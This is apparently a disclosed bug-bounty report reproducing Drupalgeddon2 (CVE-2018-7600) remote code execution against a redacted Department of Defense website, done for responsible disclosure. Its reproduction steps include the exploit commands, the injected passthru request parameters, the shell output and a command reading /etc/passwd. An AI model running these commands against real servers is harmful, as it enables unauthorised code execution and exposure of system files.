Lucene search

MvsashiH1:1063256

HistoryDec 21, 2020 - 7:51 a.m.

U.S. Dept Of Defense: [CVE-2018-7600] Remote Code Execution due to outdated Drupal server on www.█████████

2020-12-2107:51:14

mvsashi

hackerone.com

724

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.976 High

EPSS

Percentile

100.0%

JSON

Summary

Due to an outdated Drupal version, remote code execution is possible on www.█████ via CVE-2018-7600.

Description

Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.

Vulnerable Host:

www.███

Visiting https://www.███/███ we can see that we have a Drupal with version 7.54, which was updated the last time in 2017-02-01.

There are several critical and highly critical vulnerabilities known for this version (see https://api.drupal.org/api/drupal/████████/7.x and https://www.drupal.org/security). Among them is SA-CORE-2018-002 (CVE-2018-7600), which I will demonstrate here.

Note: I am reporting this here, since the page https://www.███████ seems to belong to the █████████, which belongs to the DOD. The footer further states: ██████. [...]

Step-by-step Reproduction Instructions

Download the git repository with the exploit: git clone https://github.com/dreadlocked/Drupalgeddon2.git && cd Drupalgeddon2
- Install dependencies if necessary gem install nokogiri
Run the exploit with ruby ruby drupalgeddon2-customizable-beta.rb -u https://www.████████/ -v 7 -c id --form user/login

Parameters explanation:

-u,     --url URL           Service URL
-v,     --version VERSION   Target Drupal version {7,8}
-c,     --command COMMAND   Command to execute
--form  Form to attack, by default '/user/password' in Drupal 7

The above command outputs:

root@5b08dc005375:/Drupalgeddon2# ruby drupalgeddon2-customizable-beta.rb -u https://www.████/ -v 7 -c id --form user/login
drupalgeddon2-customizable-beta.rb:184: warning: URI.escape is obsolete
[i] Requesting: www.███████//user/password/?name[%23post_render][]=passthru&name[%23markup]=id&name[%23type]=markup
[i] POST: form_id=user_pass&_triggering_element_name=name
[i] 200
[*] Obtained build id!: ████████
drupalgeddon2-customizable-beta.rb:220: warning: URI.escape is obsolete
drupalgeddon2-customizable-beta.rb:221: warning: URI.escape is obsolete
[i] Requesting: www.█████/file/ajax/name/%23value/██████
[i] POST: form_build_id=█████
[i] Response code: 200
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
root@5b08dc005375:/Drupalgeddon2#

As we can see, we successfully executed the id command, which responded with uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0

I am also providing the output of /etc/passwd which I obtained with command

ruby drupalgeddon2-customizable-beta.rb -u https://www.██████/ -v 7 -c "cat /etc/passwd" --form user/login

Output:

████
██████
███████
████████
█████████
█████████
██████████
███
████
█████████
██████████
████
██████████
████████ █████
█████████
██████████
████████
██████████
██████
████
█████████
███████
███████
████
██████████
███
█████
█████
██████